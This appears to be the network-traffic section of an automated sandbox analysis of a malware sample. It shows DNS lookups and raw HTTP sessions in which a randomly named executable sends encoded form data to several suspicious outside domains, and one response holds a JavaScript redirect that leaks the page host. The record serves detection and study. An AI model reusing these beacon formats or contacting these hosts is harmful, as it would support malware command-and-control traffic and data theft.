                                                                                                                                                                                Nov 29, 2024 09:16:50.056787968 CET1.1.1.1192.168.2.40xd155No error (0)www.ana-silverco.shop172.67.156.195A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:17:05.056221008 CET1.1.1.1192.168.2.40x6e48No error (0)www.gadgetre.info209.74.77.107A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:17:20.288288116 CET1.1.1.1192.168.2.40x2c37No error (0)www.acc888ommodate.xyz176.32.38.130A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:17:35.215606928 CET1.1.1.1192.168.2.40x13bNo error (0)www.nb-shenshi.buzz161.97.168.245A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:17:51.032963991 CET1.1.1.1192.168.2.40x48a1No error (0)www.taxitayninh365.sitetaxitayninh365.siteCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:17:51.032963991 CET1.1.1.1192.168.2.40x48a1No error (0)taxitayninh365.site103.75.185.22A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:17:51.033034086 CET1.1.1.1192.168.2.40x48a1No error (0)www.taxitayninh365.sitetaxitayninh365.siteCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:17:51.033034086 CET1.1.1.1192.168.2.40x48a1No error (0)taxitayninh365.site103.75.185.22A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:06.455128908 CET1.1.1.1192.168.2.40x71b0No error (0)www.rtpmesinkoin.clickrtpmesinkoin.clickCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:06.455128908 CET1.1.1.1192.168.2.40x71b0No error (0)rtpmesinkoin.click155.94.253.4A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:21.510445118 CET1.1.1.1192.168.2.40xc65fNo error (0)www.cortisalincontrol.net208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:37.486826897 CET1.1.1.1192.168.2.40x9506No error (0)www.carsten.studiocarsten.studioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:37.486826897 CET1.1.1.1192.168.2.40x9506No error (0)carsten.studio217.160.0.200A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:53.383780003 CET1.1.1.1192.168.2.40xfe9dNo error (0)www.conseilnsaftogo.orgconseilnsaftogo.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:53.383780003 CET1.1.1.1192.168.2.40xfe9dNo error (0)conseilnsaftogo.org154.70.82.246A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:53.383795023 CET1.1.1.1192.168.2.40xfe9dNo error (0)www.conseilnsaftogo.orgconseilnsaftogo.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:18:53.383795023 CET1.1.1.1192.168.2.40xfe9dNo error (0)conseilnsaftogo.org154.70.82.246A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:19:08.872327089 CET1.1.1.1192.168.2.40x3083No error (0)www.speedfactory.shop172.67.216.173A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 29, 2024 09:19:08.872327089 CET1.1.1.1192.168.2.40x3083No error (0)www.speedfactory.shop104.21.37.251A (IP address)IN (0x0001)false

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • www.laohub10.net
                                                                                                                                                                                • www.5tuohbpzyj9.buzz
                                                                                                                                                                                • www.canadavinreport.site
                                                                                                                                                                                • www.ana-silverco.shop
                                                                                                                                                                                • www.gadgetre.info
                                                                                                                                                                                • www.acc888ommodate.xyz
                                                                                                                                                                                • www.nb-shenshi.buzz
                                                                                                                                                                                • www.taxitayninh365.site
                                                                                                                                                                                • www.rtpmesinkoin.click
                                                                                                                                                                                • www.cortisalincontrol.net
                                                                                                                                                                                • www.carsten.studio
                                                                                                                                                                                • www.conseilnsaftogo.org

                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                0192.168.2.44974123.225.159.42801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:15:52.209532976 CET506OUTGET /8s5b/?Tr=kdnPUNSPd0&JZOtU=CIoU3XkQQhyfpcUjsw2DsPW4kkmgmyFqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYoVtQCZc0hRmp1UzBtNRjBvgSGCiGnWKebw= HTTP/1.1
                                                                                                                                                                                Host: www.laohub10.net
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:15:53.399683952 CET532INHTTP/1.1 200 OK
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Cache-Control: max-age=86400
                                                                                                                                                                                Age: 1
                                                                                                                                                                                Connection: Close
                                                                                                                                                                                Content-Length: 357
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                1192.168.2.449764156.232.181.155801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:16:09.869949102 CET784OUTPOST /abgi/ HTTP/1.1
                                                                                                                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.5tuohbpzyj9.buzz
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 61 4d 6c 59 75 6d 48 52 4e 77 34 34 75 5a 46 4e 69 32 61 53 58 66 52 6a 35 35 36 6c 2f 4d 46 30 54 31 4a 4a 7a 41 70 32 75 4a 54 48 55 61 59 42 6e 79 51 57 46 4c 66 45 4c 56 59 79 52 42 4f 53 4d 47 51 79 78 4b 6b 4e 2b 4b 61 6f 55 6c 39 48 56 62 71 6d 4e 4a 50 45 31 47 6f 66 59 48 69 33 73 44 73 72 43 50 34 56 6d 65 79 47 42 43 49 64 64 75 50 56 42 5a 38 79 77 61 63 6e 4f 35 59 48 75 72 50 38 4d 67 77 58 74 33 34 37 47 63 67 30 6e 53 2b 63 70 68 33 30 67 35 2b 43 33 71 54 4f 6e 6e 58 2b 71 76 74 5a 51 46 79 66 2b 71 59 54 78 66 2f 6d 77 3d 3d
                                                                                                                                                                                Data Ascii: JZOtU=GqE9dwVezIHb5aMlYumHRNw44uZFNi2aSXfRj556l/MF0T1JJzAp2uJTHUaYBnyQWFLfELVYyRBOSMGQyxKkN+KaoUl9HVbqmNJPE1GofYHi3sDsrCP4VmeyGBCIdduPVBZ8ywacnO5YHurP8MgwXt347Gcg0nS+cph30g5+C3qTOnnX+qvtZQFyf+qYTxf/mw==


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                2192.168.2.449770156.232.181.155801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:16:12.570077896 CET804OUTPOST /abgi/ HTTP/1.1
                                                                                                                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.5tuohbpzyj9.buzz
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 36 38 6c 4c 66 6d 48 46 64 77 37 39 75 5a 46 44 43 33 52 53 58 44 52 6a 37 49 39 6c 73 34 46 33 32 5a 4a 4b 79 41 70 6c 65 4a 54 54 45 62 53 4d 48 7a 65 57 46 48 58 45 4a 42 59 79 56 52 4f 53 4e 32 51 79 43 53 6e 50 75 4b 59 75 55 6c 37 49 31 62 71 6d 4e 4a 50 45 78 57 43 66 59 50 69 77 63 54 73 6f 6a 50 6e 59 47 65 74 58 42 43 49 5a 64 75 4c 56 42 5a 65 79 31 79 36 6e 4d 42 59 48 75 37 50 79 34 55 2f 5a 64 33 69 6c 32 63 2b 79 6e 6a 47 62 5a 39 35 70 44 70 76 41 6e 65 4f 43 42 71 4e 76 62 4f 36 4c 51 68 42 43 35 6a 73 65 79 69 32 39 77 39 66 34 7a 4a 2b 48 47 53 76 45 7a 6f 76 35 2b 61 6a 42 33 49 3d
                                                                                                                                                                                Data Ascii: JZOtU=GqE9dwVezIHb568lLfmHFdw79uZFDC3RSXDRj7I9ls4F32ZJKyApleJTTEbSMHzeWFHXEJBYyVROSN2QyCSnPuKYuUl7I1bqmNJPExWCfYPiwcTsojPnYGetXBCIZduLVBZey1y6nMBYHu7Py4U/Zd3il2c+ynjGbZ95pDpvAneOCBqNvbO6LQhBC5jseyi29w9f4zJ+HGSvEzov5+ajB3I=


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                3192.168.2.449775156.232.181.155801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:16:15.338232040 CET10886OUTPOST /abgi/ HTTP/1.1
                                                                                                                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.5tuohbpzyj9.buzz
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 36 38 6c 4c 66 6d 48 46 64 77 37 39 75 5a 46 44 43 33 52 53 58 44 52 6a 37 49 39 6c 73 67 46 33 45 52 4a 49 52 59 70 30 75 4a 54 51 45 62 54 4d 48 79 43 57 46 76 74 45 4a 4e 6d 79 54 4e 4f 54 76 4f 51 30 7a 53 6e 46 75 4b 59 6a 30 6c 2b 48 56 62 2f 6d 4f 78 44 45 31 79 43 66 59 50 69 77 65 62 73 38 69 50 6e 61 47 65 79 47 42 43 55 64 64 75 7a 56 42 42 6b 79 31 2b 4d 6b 39 68 59 45 50 4c 50 2f 72 38 2f 62 39 33 6b 6b 32 64 74 79 6e 76 5a 62 5a 51 47 70 41 31 46 41 6b 43 4f 53 33 7a 67 31 5a 4f 5a 55 79 30 62 56 49 48 4a 58 42 4b 49 38 51 4d 67 6f 6a 31 44 59 33 65 30 45 6a 42 4b 71 74 44 68 5a 54 74 51 63 48 2f 66 55 54 68 44 51 6c 48 4e 6c 75 45 71 6b 2f 63 41 34 61 4a 4e 77 41 31 2f 39 74 7a 32 49 54 72 64 2b 52 39 73 6c 56 67 52 34 35 6e 34 59 69 43 55 6f 58 65 38 6b 65 65 72 42 4b 49 5a 61 4e 59 63 42 62 49 4c 46 53 2b 6e 6b 70 76 6e 7a 4e 31 48 76 4c 31 59 73 56 53 52 6b 4e 74 36 6f 5a 4d 76 55 38 35 6f 33 32 4a 31 39 42 7a 48 45 55 38 4e [TRUNCATED]
                                                                                                                                                                                Data Ascii: JZOtU=GqE9dwVezIHb568lLfmHFdw79uZFDC3RSXDRj7I9lsgF3ERJIRYp0uJTQEbTMHyCWFvtEJNmyTNOTvOQ0zSnFuKYj0l+HVb/mOxDE1yCfYPiwebs8iPnaGeyGBCUdduzVBBky1+Mk9hYEPLP/r8/b93kk2dtynvZbZQGpA1FAkCOS3zg1ZOZUy0bVIHJXBKI8QMgoj1DY3e0EjBKqtDhZTtQcH/fUThDQlHNluEqk/cA4aJNwA1/9tz2ITrd+R9slVgR45n4YiCUoXe8keerBKIZaNYcBbILFS+nkpvnzN1HvL1YsVSRkNt6oZMvU85o32J19BzHEU8NhKSBj8L97/Nw7XSK7jij6xIfZTw0bx7BCRWk+18MpgMFTOZybV+JVx6/HnSklPL3J6+ym8kosc5uiSBBWFoN28WgqTSesPHc8YX0ySMu8TTlGhUvYzYmJRKBqevFM8NMhMzTA3nWnmxXkxiKBHa4esTPNhYqotKWP2n01edOk4uSqUIOrvh/QkzvlklXQhjzgFX2t3DPpiI98IvVY4bU/npd8LI7qFGUn5O+akBAeBNUfucztCMhp6u0G4LDlctRiaZy6ShTaR4iz5qHMfQ97k3JIgTJ6/e8irYLL0cA0VDjnBpnT9JFqBPWeCpt8KXe+d2Yd6YuopDnWKP2CgYkbxHvCv6+AqwmLBedyQwzdpH1AdBPfdcQPp9fRiabu1gl3fcDMSDBCGZAH8MNPYjog7AB/x+I9peBbB1CFe2IRAYtO+CmHbof3YQyLl9ueGZ/eHK3P9vRiRmOqJyiNh4n6TbwyPS11/7ddq7UzDJtR1Vedxn9SEgleZ01saHXZNI/rm9n94ZU/ZxTrVsi7nBQ2C0AFheHnguJIXOAeLMzl4kdFPQ8GtV+AMeTGxOSP7Nq2bj74NNgM0427r12FaBaGH2do9CAspWDEYyusK2l3a/5SjLmVbW702cQXKhwZHm7RsX2kKMBqxDeci+In3vVSBO0X7hNetFbOK [TRUNCATED]


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                4192.168.2.449786156.232.181.155801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:16:18.009052992 CET510OUTGET /abgi/?JZOtU=LosdeFxQ6b3v/d4RM/O2IIZZxupncQ/ZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNvb4tlpcb0DKt+sPWXegcoTW+dqe2j7yGXM=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:16:19.613151073 CET709INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:19 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 566
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                5192.168.2.449802185.27.134.206801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:16:25.264139891 CET796OUTPOST /4d2l/ HTTP/1.1
                                                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.canadavinreport.site
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.canadavinreport.site/4d2l/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 55 45 70 4a 2b 38 42 77 62 64 33 52 52 4e 55 58 69 68 49 4b 6c 6d 77 73 54 70 65 75 49 77 4a 6c 37 39 4d 2f 4e 2b 34 42 42 4b 4c 38 30 4b 48 54 48 63 4d 70 36 6c 50 46 51 51 6c 69 46 72 75 37 70 77 61 32 71 67 4b 77 6b 33 5a 38 5a 54 50 66 39 74 78 4d 59 5a 30 34 32 4f 4c 52 62 55 64 56 74 58 74 59 4b 62 64 51 37 48 7a 38 64 71 6c 4c 75 2b 39 71 39 56 33 6c 75 59 50 6d 65 75 67 4c 69 69 76 32 6f 73 51 59 71 31 4e 41 55 54 30 64 63 37 6c 4c 66 79 61 67 69 75 41 53 6c 4b 46 5a 48 32 6e 76 6c 75 61 49 54 67 35 6b 34 47 55 4b 78 31 76 2f 6d 52 45 4a 55 44 38 41 52 6a 6f 41 35 41 3d 3d
                                                                                                                                                                                Data Ascii: JZOtU=UEpJ+8Bwbd3RRNUXihIKlmwsTpeuIwJl79M/N+4BBKL80KHTHcMp6lPFQQliFru7pwa2qgKwk3Z8ZTPf9txMYZ042OLRbUdVtXtYKbdQ7Hz8dqlLu+9q9V3luYPmeugLiiv2osQYq1NAUT0dc7lLfyagiuASlKFZH2nvluaITg5k4GUKx1v/mREJUD8ARjoA5A==
                                                                                                                                                                                Nov 29, 2024 09:16:26.546080112 CET683INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:26 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Encoding: br
                                                                                                                                                                                Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 74 39 ad 1c b5 70 c1 12 27 79 52 f3 a9 bf 55 d1 77 ed c0 39 51 27 3a d5 c8 06 df 2c 39 71 c0 13 2e 8f ba d1 4f 78 d5 39 3c fd e7 26 d0 b5 0b 89 41 90 53 12 98 e6 a4 87 5a 8d 01 7e 52 71 3c c3 24 53 6e 41 fb 0b 08 9a 16 bb b1 50 be e9 4b 59 4e 30 72 16 81 05 38 e5 e4 e7 77 6d f3 90 61 01 a5 88 75 70 10 e4 ca b8 74 e0 b0 a4 2d 8e 72 84 fe 21 ee bb ff 2e 12 4f 6e 1b a0 03 5c 2b 56 7e 7e 63 2b 23 29 67 8d 96 75 fd fc dc 0a b1 bf f4 f7 f4 1f 26 73 29 af e7 73 b5 bb f4 e1 2b c3 3c 76 12 42 ec 25 af 7d cb be 6f 7b ed c3 10 b9 50 06 51 de d8 4f ff 7d 09 39 ac 20 44 e1 c5 51 01 0d 82 28 1f 76 39 1b 12 fa 1f 6f 4f 49 80 fe 03 fa 3c cb b4 12 96 0b 15 45 b1 4d 45 5e 9a 3c c9 0a 61 75 26 b8 4e 21 c2 3a e6 b5 28 93 34 35 b1 73 ae cc 4d 22 44 5a 0a 9e 89 38 2b 33 9d 0a 5f f2 06 32 8f 7d ec 0b ad 23 a5 72 e5 0b 11 5b 95 a6 22 16 36 4a 7d 11 9b 22 15 2d ae ed c4 4c 1b 5d 01 4c 49 f8 fb bb 74 8b a5 84 21 d2 90 c0 ce 5f df 7f 50 eb cc 7c 37 5d 06 06 c7 58 61 8d 50 08 6b c0 cc 0f 65 bb [TRUNCATED]
                                                                                                                                                                                Data Ascii: 1b98 t9p'yRUw9Q':,9q.Ox9<&ASZ~Rq<$SnAPKYN0r8wmaupt-r!.On\+V~~c+#)gu&s)s+<vB%}o{PQO}9 DQ(v9oOI<EME^<au&N!:(45sM"DZ8+3_2}#r["6J}"-L]LIt!_P|7]XaPke 3$)@TYVex|o|&'"ngS6`(y.k%3@O%/7.>`2JAdJ[hT0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                6192.168.2.449808185.27.134.206801668C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 29, 2024 09:16:27.933073044 CET816OUTPOST /4d2l/ HTTP/1.1
                                                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.canadavinreport.site
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.canadavinreport.site/4d2l/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Raw: 4a 5a 4f 74 55 3d 55 45 70 4a 2b 38 42 77 62 64 33 52 52 70 6f 58 74 67 49 4b 74 6d 77 74 50 5a 65 75 52 67 4a 68 37 39 41 2f 4e 2f 4e 47 42 5a 76 38 31 72 33 54 41 59 59 70 7a 31 50 46 49 67 6c 6e 42 72 75 4f 70 77 57 45 71 68 32 77 6b 7a 78 38 5a 52 58 66 2b 65 70 4e 62 70 30 36 75 2b 4c 54 47 45 64 56 74 58 74 59 4b 62 4a 32 37 48 72 38 64 5a 4e 4c 38 71 70 70 78 31 33 6b 74 59 50 6d 56 4f 67 50 69 69 75 62 6f 6f 51 79 71 32 6c 41 55 53 45 64 62 71 6c 4d 52 43 62 4b 6d 75 41 41 6c 61 63 70 50 6b 57 77 6a 63 36 54 61 52 74 32 35 41 5a 51 67 45 4f 6f 30 52 67 36 4a 45 31 30 63 67 56 4a 69 43 73 68 4f 63 77 79 56 79 52 2b 57 79 2f 4c 75 33 79 5a 2f 43 55 3d
                                                                                                                                                                                Data Ascii: JZOtU=UEpJ+8Bwbd3RRpoXtgIKtmwtPZeuRgJh79A/N/NGBZv81r3TAYYpz1PFIglnBruOpwWEqh2wkzx8ZRXf+epNbp06u+LTGEdVtXtYKbJ27Hr8dZNL8qppx13ktYPmVOgPiiubooQyq2lAUSEdbqlMRCbKmuAAlacpPkWwjc6TaRt25AZQgEOo0Rg6JE10cgVJiCshOcwyVyR+Wy/Lu3yZ/CU=
